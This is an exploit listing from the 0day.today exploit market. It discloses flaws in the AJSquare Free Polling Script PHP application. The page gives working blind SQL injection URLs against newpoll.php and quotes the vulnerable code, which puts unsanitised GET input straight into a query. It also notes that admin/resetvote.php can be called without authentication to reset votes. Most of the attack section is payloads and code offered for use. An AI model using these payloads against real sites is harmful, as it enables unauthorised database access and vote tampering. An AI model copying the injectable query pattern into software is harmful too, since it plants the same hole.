[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

AJSquare Free Polling Script (DB) Multiple Vulnerabilities

Author
G4N0K
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-4153
Category
web applications
Date add
10-11-2008
Platform
unsorted
==========================================================
AJSquare Free Polling Script (DB) Multiple Vulnerabilities
==========================================================


==============================================================================
	AJSquare Free Polling Script (DB) Multiple Vulnerabilities
==============================================================================

	[»] Script:             [ AJSquare Free Polling Script DataBase Version ]
	[»] Language:           [ PHP ]
	[»] Website:            [ http://www.ajsquare.com/resources/dpoll.php?resource=free_script ]
	[»] Type:               [ Free ]
	[»] Report-Date:        [ 10.11.2008 ]
	[»] Founder:            [ G4N0K ]


===[ XPL ]===

	[1][!] Blind SQLi (MQ = off)
		[»] http://127.0.0.1/[path]/admin/include/newpoll.php?ques=1%27/**/AND/**/substring(@@version,1,1)=5/*		True
		[»] http://127.0.0.1/[path]/admin/include/newpoll.php?ques=1%27/**/AND/**/substring(@@version,1,1)=4/*		False
		
		[../admin/include/newpoll.php]
		
			<?php
			require 'connect.php';
			$ques = $_GET[ques];
			$total = $_GET[total];
			for($i=1;$i<=$total;$i++)
				{
					$val[] = array($_GET["val".$i]);
				}

			$sqlnew = "select * from newpoll where question='$ques'";
			$resnew = mysql_query($sqlnew);
			
		[../admin/include/newpoll.php]
	
	
	

	[2][!] Reset Votes - Just call resetvote.php ;)
		[»] http://127.0.0.1/[path]/admin/resetvote.php


	
	
===[ Greetz ]===

	[»] ALLAH
	[»] Tornado2800 
	[»] Hussain-X 

	//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
	//ALLAH,forgimme...

===============================================================================
exit();
===============================================================================



#  0day.today [2024-11-16]  #